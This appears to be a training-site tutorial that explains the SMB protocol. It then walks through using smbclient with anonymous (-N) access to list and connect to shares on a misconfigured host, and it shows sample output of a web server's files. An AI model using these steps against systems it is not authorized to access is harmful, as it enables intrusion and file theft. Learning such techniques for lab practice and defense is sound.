What's an SMB?
SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.
SMB is a client-server, request-response protocol. The only exception to the request-response nature of SMB (that is, where the client makes requests and the server sends back responses), is when the client has requested opportunistic locks (oplocks) and the server, subsequently, has to break an already granted oplock because another client has requested a file open with a mode that's incompatible with the granted oplock. In this case, the server sends an unsolicited message to the client signalling the oplock break.
Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.
(Samba.org)
Exploiting Badly Configured SMB'S
What you'll need:
- A machine that can run smbclient command
- A vulnerable/poorly configured SMB machine (remote or local)
- SMB PORT: 445
Steps:
Check Sharenames
To view smb share names use the command:
smbclient -L 192.168.25.1 -N
(192.168.25.1 = ip of vulnerable smb)
Sign up now for a free 7 Day Trial today to enroll in these Career Paths:
You'll get something like this:
`WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
Sharename Type Comment
--------- ---- -------
arquivos Disk
IPC$ IPC IPC Service (Samba Server 4.3.9-Ubuntu)
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
Server Comment
--------- -------
SAMBA Samba Server 4.3.9-Ubuntu
Workgroup Master
--------- -------
COMPUTACAO SAMBA `
After doing that, you'll need to pick a Sharename. For example "arquivos" or "IPC$". I highly recommend you to pick one that doesn't have the symbol "$", because it's easy to get one with permissions.
In this case, I'm going to pick "arquivos" as Sharename.
Finally:
smbclient //192.168.25.1/arquivos -N
And, that's pretty much it...
Now, if your host is totally vulnerable, you can upload files, download files, etc.
EX:
` WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: > ls
. D 0 Tue Jul 19 09:12:48 2016
.. D 0 Fri May 22 09:25:21 2015
html D 0 Fri Jul 15 03:48:38 2016
codeigniter D 0 Fri Jul 3 17:00:48 2015
serverconfig.php A 100402 Fri Jul 15 03:48:46 2016
phpmyadmin D 0 Fri May 22 16:28:47 2015
khy AR 0 Tue Jul 19 09:12:48 2016
cgitelnet1 D 0 Fri Jul 15 05:40:41 2016
supp1.1 D 0 Tue Jul 7 19:35:09 2015
index.html N 142 Tue May 10 16:30:59 2016
teste.php A 21 Fri May 22 11:56:35 2015
enxjdf.exe N 571074 Mon Apr 14 16:06:33 2008
cherno.php N 210752 Fri Jul 15 05:13:46 2016
151380148 blocks of size 1024. 132224492 blocks available
smb: >
<br><br> You can view all the smbclient commands by typing "?" <br><br>smb: > ?
? allinfo altname archive backup
blocksize cancel casesensitive cd chmod
chown close del dir du
echo exit get getfacl geteas
hardlink help history iosize lcd
link lock lowercase ls l
mask md mget mkdir more
mput newer notify open posix
posixencrypt posixopen posixmkdir posixrmdir posixunlink
print prompt put pwd q
queue quit readlink rd recurse
reget rename reput rm rmdir
showacls setea setmode scopy stat
symlink tar tarmode timeout translate
unlock volume vuid wdel logon
listconnect showconnect tcon tdis tid
logoff .. !
`
I made a Python script that does all the hard work; if you want, you can get it here.
Start Learning Cyber Security today by enrolling in these Courses Now: